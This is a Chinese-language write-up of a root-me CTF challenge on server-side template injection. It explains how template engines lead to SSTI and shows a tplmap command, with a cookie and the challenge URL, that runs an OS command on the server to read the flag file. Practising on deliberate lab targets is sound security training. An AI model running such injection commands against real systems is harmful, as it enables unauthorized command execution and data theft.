1. 程式人生 > >【root-me CTF練習】Web伺服器安全-SSTI攻擊(模板注入)

【root-me CTF練習】Web伺服器安全-SSTI攻擊(模板注入)

靶機地址

http://challenge01.root-me.org/web-serveur/ch41/

模板引擎

模板的誕生是為了將顯示與資料分離,模板技術多種多樣,但其本質是將模板檔案和資料通過模板引擎生成最終的HTML程式碼。服務端模板注入和常見Web注入的成因一樣,也是服務端接收了使用者的輸入,將其作為 Web 應用模板內容的一部分,在進行目標編譯渲染的過程中,執行了使用者插入的惡意內容,因而可能導致了敏感資訊洩露、程式碼執行、GetShell 等問題。

每種後端語言都有幾種相應的模板引擎,就像資料庫注入有多種資料庫型別,要掌握全部模板引擎語法不太現實,所以我們只需要掌握通用的語法即可(類似於SQL語句)。

可見模板引擎解析了我們傳遞的運算,所以這裡存在模板注入:
在這裡插入圖片描述

模板注入檢測工具

https://github.com/epinna/tplmap

可看到,該工具內建了目前各種語言主流的模板注入程式碼。
在這裡插入圖片描述

解題

python tplmap.py -X POST -d “nickname=1” -c “uid=wKgbZFwIcliZ10NaAwY0Ag==” -A “User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0” -u “http://challenge01.root-me.org/web-serveur/ch41/check

” --os-cmd “cat SECRET_FLAG.txt”
通過該工具,即可進行模板注入:得到flag
在這裡插入圖片描述